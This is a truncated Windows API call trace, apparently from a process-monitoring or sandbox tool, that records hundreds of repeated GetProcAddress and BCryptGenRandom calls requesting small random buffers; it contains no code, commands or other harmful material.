[0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fa5, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a16fa5) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fd3, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a16fd3) returned 0x0 [0226.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.107] BCryptGenRandom (in: 